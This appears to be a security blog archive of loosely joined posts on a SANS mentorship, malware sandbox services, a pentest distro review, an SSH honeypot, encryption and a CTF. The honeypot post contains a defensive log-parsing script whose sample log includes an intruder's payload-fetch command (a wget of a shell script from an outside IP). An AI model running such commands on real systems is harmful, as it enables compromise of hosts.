I will be acting as a Mentor for the SANS SEC504 class
I am pleased to announce that I will be acting as a Mentor for the SANS SEC504 class (Hacker Tools, Techniques, Exploits and Incident Handling), coming up in February 2016.
What has me most excited is the format of the class and the whole Mentor program. The Mentor program is great for students who prefer, or are forced, to study on their own, as opposed to sitting in a 5-day class. The format works like this: students are responsible for studying the material, and the class meets once a week for a group study session and to answer questions. I am available to students for over 10 weeks to assist with studying and to answer questions. I see this as a huge positive, because many of us in the industry are self-learners who have taught ourselves how to learn on our own. The SANS Mentor program is a perfect example of learning on your own while moving at a decently rapid pace.
I am extremely excited to get the opportunity to work with SANS on this fun and exciting course. It is my favorite of the SANS courses I’ve attended, and it will be exciting to mentor future students in the class and help them on their way to becoming a SANS GIAC Certified Incident Handler (GCIH).
From the GCIH information page:
Incident handlers manage security incidents by understanding common attack techniques, vectors and tools as well as defending against and/or responding to such attacks when they occur. The GCIH certification focuses on detecting, responding, and resolving computer security incidents and covers the following security techniques:
- The steps of the incident handling process
- Detecting malicious applications and network activity
- Common attack techniques that compromise hosts
- Detecting and analyzing system and network vulnerabilities
- Continuous process improvement by discovering the root causes of incidents
From the SANS SEC504 page:
The Internet is full of powerful hacking tools and bad guys using them extensively. If your organization has an Internet connection or one or two disgruntled employees (and whose doesn’t!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth. As defenders, it is essential we understand these hacking tools and techniques.
By helping you understand attackers’ tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, this course helps you turn the tables on computer attackers. It addresses the latest cutting-edge insidious attack vectors, the “oldie-but-goodie” attacks that are still prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course provides a time-tested, step-by-step process for responding to computer incidents, and a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them. In addition, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence. Finally, students will participate in a hands-on workshop that focuses on scanning for, exploiting, and defending systems. It will enable you to discover the holes in your system before the bad guys do!
The course is particularly well-suited to individuals who lead or are a part of an incident handling team. General security practitioners, system administrators, and security architects will benefit by understanding how to design, build, and operate their systems to prevent, detect, and respond to attacks.
I have been steadily using Malware Investigator since its public debut in early March of 2015.
I have grown more and more upset with the service over this time period, and in the end I’ve realized it isn’t providing me any more of a service than what is already provided by Cuckoo, VirusTotal, or malwr. Furthermore, even with some of the early problems faced by malwr, I still believe that malwr is more available than the Malware Investigator tool is.
Problems experienced using Malware Investigator:
1) Downtime – Their servers are often down outside normal business hours, and sometimes even during business hours. Often, the SAML authentication between the InfraGard website and Malware Investigator fails, or I get redirected to various error pages at Malware Investigator.
2) Processing Time – It often takes an insane amount of time to analyze what I submit. For the majority of the malware I have submitted to their website, I would guess that the mean time to analyze is approaching a week and a half. I feel that they should have enough resources at their disposal to process malware faster than 1.5 weeks.
3) Correlations – This is the part that really got me excited to use Malware Investigator. However, it seems to be a bit of a misnomer. I had thought it would compare the malware I find against malware used in higher-profile breaches / incidents and alert me to any match (with a certain level of discretion, of course, given the different classification levels of information provided by the FBI). Unfortunately, correlations generally just give you the ability to see the usernames of other people who have uploaded that same piece of malware.
4) General Brokenness –
a) My profile has become littered with malware that I never submitted. There are a number of .dll files on my screen that have (supposedly) had analysis performed against them, which I never submitted.
b) I can’t get a proper listing of the malware I submitted to the site unless I happen to remember the name of the sample. The general overview, where you should be able to browse all the malware you submitted, is completely broken for me; the only way to find something I submitted is to remember its name and search for it. So the search process still works, but the listing of malware doesn’t.
I will point out the single feature I like at Malware Investigator, and the only reason I still use it: I use it to analyze all the Linux, Unix, MIPS, and other non-Windows malware that I am able to collect. That is the single weakness of both malwr and VirusTotal: they will not, or more properly said, do not have the ability to analyze the various Linux/Unix/MIPS/whatever malware variants that I upload.
So, with all these problems I have experienced, I ask the question, “How broken is Malware Investigator?” And, “Is Malware Investigator broken beyond belief?”
Do you think that malwr and VT should start accepting and processing Linux malware, or does it represent such a low number of infections that it would be going too far? Let me know by posting a comment down below.
Please leave a comment and let me know if you use Malware Investigator, and if you don’t, why not; I want to hear other people’s reactions to Malware Investigator.
This was a relatively easy challenge, but it was really fun to use some of my IR analyst skills to analyze pcaps and so on. I would rate this as a very easy/beginner-level challenge, but fun nonetheless.
(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)
Packt Publishing “Free Learning” is giving away books, from yesterday, April 30th – May 17th. Make sure you check Packt Publishing daily and get a copy of a free book.
So, several months ago, I wrote about a tool that the FBI was going to make available to members of InfraGard, called Malware Investigator. This tool was set to provide members of law enforcement and InfraGard with analysis of submitted malware. I said that I would provide a detailed write-up regarding how useful the tool is and how it helps me analyze the malware I find. I am happy to do that for you here; here is my review of Malware Investigator.
I submitted 3 malware samples that I found via my SSH honeypot. Granted, these samples were compiled for execution on a MIPS-based system, so all the other malware analysis tools proved to be relatively worthless, as most of them are only set up to run w32 (Windows) binaries and test the execution of that malware. I submitted these samples on 4/20, one at approx. 7:30 AM MDT and the other two later in the day, approx. 4:30 PM MDT.
As I am writing this post, on 4/23 at approx. 9:45 AM MDT, the analysis of all three files is still incomplete. Since these are sort of odd-ball files to submit (again, they are MIPS executables), I think a day is a reasonable amount of time to run the malware in a sandbox and provide a report. However, at 3 days and still going, I think this sort of analysis is taking far too long for the service to be useful to the malware hunters out there.
Depending on the output, and if it ever completes, I may or may not provide a follow-up to this article detailing how accurate the malware analysis at Malware Investigator was; it is something to write about.
The positive side of the analysis of the files (just one included here) is that it does provide some decent initial details; however, what I’m really curious about is the attribution and correlation that the FBI provides me with (if any).
I downloaded a copy of Cyborg Hawk Linux 1.1 several weeks ago, and unfortunately didn’t get around to actually installing it and using it until today.
My very first impression was how “beautiful” the desktop is; but that is about where the beauty ends.
So, on to my use of it:
There are a bunch of tools on there, many of which I’m not familiar with and which aren’t in Kali Linux. I visited Cyborg Hawk Linux’s homepage to read what documentation and tutorials they have on their website, and the pages they link to are down (see here). There are several pages up in their “Documentation” section, so I perused those for a bit, not really finding the info I needed. I will come back later to the tools I’m unfamiliar with and put in the manual research time for those.
Launching tools that I’ve either used before or actually have a pressing need to examine (I’ve got some malware samples that I really want to take a look at), I tried to launch Cuckoo, and it failed. I’m not extremely familiar with any of the other tools, but again, I will return to those once I can read up on them and learn how to use them.
Next I headed off to tools that I’m extremely familiar with, including Metasploit. I launched the Metasploit service, then attempted to update the modules, and it failed. I attempted to register the service, and that failed too, so I’m unable to update or use Metasploit.
So far, in a couple of hours of use, all this distro has going for it is a pretty interface and a lot of tools. As I mentioned earlier, I will dig into those tools as soon as I have time to search and look up what each of them does. Overall, I am not very impressed with Cyborg Hawk Linux 1.1.
I decided I would set up an SSH honeypot for a bunch of reasons, and not only to poke the bear.
If you’re not familiar with what an SSH honeypot is, it is a “virtual” environment set up to replicate an SSH server, and once in, it replicates the basic look and feel of a server you would SSH into. In my example, it gives the basic outward appearance of a Debian server. Once the “bad guy” logs in, it logs all his activity: everything he tries to put on the server, everything he tries to take off the server, and all the commands that he types (or has scripted out). I’m extremely interested to see what these “bad guys” are doing.
I can’t say for certain why I wanted to set up a honeypot server, beyond wanting to see what an attacker would do once he gets inside the system. In the day that I’ve had the server up, the password has been guessed several times; however, no attacks have been made against the server and there has been no login besides the initial brute-force connection attempting to break in. So nothing really to report on as of yet; but I am truly interested in the attacks that occur against my server after someone logs in and starts doing something.
There is also another pretty good-looking utility to go along with the Kippo SSH honeypot, called Kippo-Graph, which presents the data from the honeypot in a nice, easy-to-read web page format. It also has a nice little interface that steps through all the commands the “bad guy” types and displays them in amazing detail. So, I’m also pretty excited about that.
I will report back once I have some solid data collected and something more happens besides the initial brute-force attempt. Here’s to running an SSH honeypot. . .
It should be noted that it makes sense to have a pretty good idea what you’re getting into when you’re setting up an SSH honeypot. As in the title, I’m not simply doing it to poke the bear; I want to gain an understanding of what an attacker does once they see an available SSH host (SSH honeypot).
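The post describes what the honeypot records: login attempts, the commands the intruder types, and anything they try to pull onto the box. The script below is an added example (not from the post and not part of Kippo or Kippo-Graph) that turns that raw log into a per-session summary a defender can review: credentials tried, whether one succeeded, the command sequence, and any URLs fetched. The log lines are constructed here in the shape I recall Kippo's kippo.log using (timestamp, then a bracketed component name with session id and source IP); treat that format, the IPs, and the command lines as assumptions for illustration.

```python
import re
from collections import Counter

# Constructed sample lines in the assumed shape of Kippo's kippo.log.
# Not real honeypot output; session ids and IPs are made up (documentation ranges).
SAMPLE_LOG = """\
2015-02-10 03:14:07+0000 [SSHService ssh-userauth on HoneyPotTransport,7,203.0.113.45] login attempt [root/123456] failed
2015-02-10 03:14:09+0000 [SSHService ssh-userauth on HoneyPotTransport,7,203.0.113.45] login attempt [root/password] failed
2015-02-10 03:14:11+0000 [SSHService ssh-userauth on HoneyPotTransport,7,203.0.113.45] login attempt [root/admin] succeeded
2015-02-10 03:14:15+0000 [HoneyPotProtocol,7,203.0.113.45] CMD: uname -a
2015-02-10 03:14:18+0000 [HoneyPotProtocol,7,203.0.113.45] CMD: cat /proc/cpuinfo
2015-02-10 03:14:22+0000 [HoneyPotProtocol,7,203.0.113.45] CMD: wget http://198.51.100.9/bins.sh
2015-02-10 03:14:30+0000 [HoneyPotProtocol,7,203.0.113.45] Connection lost.
2015-02-10 04:02:51+0000 [SSHService ssh-userauth on HoneyPotTransport,8,198.51.100.77] login attempt [admin/admin] failed
2015-02-10 04:02:53+0000 [SSHService ssh-userauth on HoneyPotTransport,8,198.51.100.77] login attempt [pi/raspberry] failed
2015-02-10 04:02:55+0000 [HoneyPotProtocol,8,198.51.100.77] Connection lost.
"""

# Assumed line shapes: a login attempt carries the session id and source IP
# after the transport name; a typed command is logged as "CMD: <text>".
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[SSHService ssh-userauth on HoneyPotTransport,"
    r"(?P<sid>\d+),(?P<ip>[^\]]+)\] login attempt "
    r"\[(?P<user>[^/]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)$"
)
CMD_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[HoneyPotProtocol,(?P<sid>\d+),(?P<ip>[^\]]+)\] CMD: (?P<cmd>.*)$"
)
URL_RE = re.compile(r"https?://\S+")


def _new_session(ip):
    return {"ip": ip, "attempts": [], "success": None, "commands": [], "urls": []}


def parse_kippo_log(text):
    """Group login attempts and typed commands by honeypot session id."""
    sessions = {}
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            s = sessions.setdefault(m["sid"], _new_session(m["ip"]))
            s["attempts"].append((m["user"], m["pw"]))
            if m["result"] == "succeeded":
                s["success"] = (m["user"], m["pw"])
            continue
        m = CMD_RE.match(line)
        if m:
            s = sessions.setdefault(m["sid"], _new_session(m["ip"]))
            s["commands"].append(m["cmd"])
            # Anything fetched with a URL is what the intruder tried to put on the box.
            s["urls"].extend(URL_RE.findall(m["cmd"]))
    return sessions


def top_credentials(sessions, n=3):
    """Most-tried user/password pairs across all sessions (for tuning the honeypot)."""
    counts = Counter(pair for s in sessions.values() for pair in s["attempts"])
    return counts.most_common(n)


def interactive_sessions(sessions):
    """Session ids where the guess succeeded and commands were actually typed."""
    return sorted(sid for sid, s in sessions.items() if s["success"] and s["commands"])


def session_report(sessions):
    """One human-readable line per session for a quick daily review."""
    lines = []
    for sid in sorted(sessions, key=int):
        s = sessions[sid]
        status = "LOGIN %s/%s" % s["success"] if s["success"] else "no login"
        lines.append("session %s from %s: %d attempts, %s, %d commands, %d urls"
                     % (sid, s["ip"], len(s["attempts"]), status,
                        len(s["commands"]), len(s["urls"])))
    return lines


if __name__ == "__main__":
    sess = parse_kippo_log(SAMPLE_LOG)
    for line in session_report(sess):
        print(line)
    print("most tried credentials:", top_credentials(sess))
    for sid in interactive_sessions(sess):
        print("commands in session", sid, "->", sess[sid]["commands"])
```

Sessions that only brute-force and never get in (session 8 above) are noise for this purpose, which is why `interactive_sessions` keeps only the ones with a successful login followed by typed commands; those are the sessions worth stepping through in Kippo-Graph.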
I use encryption in nearly every aspect of my life. Some uses are more effective than others, admittedly, but there is encryption everywhere. For example:
- My Android phone is encrypted
- My computer’s partitions are LUKS encrypted
- The website you’re reading this on is encrypted
Encryption is an integral part of my life, assuring both the security and integrity of my website, my emails, and pretty much everything I do. I don’t partake in any criminal acts, but I still don’t want anyone to be able to view my data if I don’t want them to.
I found this excellent article over at TED, discussing why you should care about encryption too.
So why does encryption matter, anyway?
Well, some would have you believe that encryption is a tool for the “bad guys,” enabling terrorists to have an easy way of plotting their next crimes. In reality, banning encryption won’t stop terror attacks or end religious extremism. But such a ban could stifle democratic movements, scuttle online security, and undermine our open society.
It was a fun little challenge, and I definitely want to give my thanks to the Infosec Institute for putting out such a fun CTF challenge!
You can also visit the page if you got stumped on a challenge and didn’t like any of my solutions; there you can see everything that other people wrote about the challenge and judge for yourself.
Nothing is more frustrating for a researcher, programmer, tester, or anyone in a similar position than attempting to document a bug and then being unable to replicate it when trying to re-create the situation. I was testing a theory about a bad installer in Fedora 21 today, and just my luck, I was unable to reproduce in my virtual environment the problem I was encountering on my desktop.
I spent this last weekend attempting to install/re-install the latest Fedora Linux release. I had already backed up all my data and done everything I needed to do to prep for the re-install. I figure my situation is not super unique, but probably a little more complicated than the average user’s install.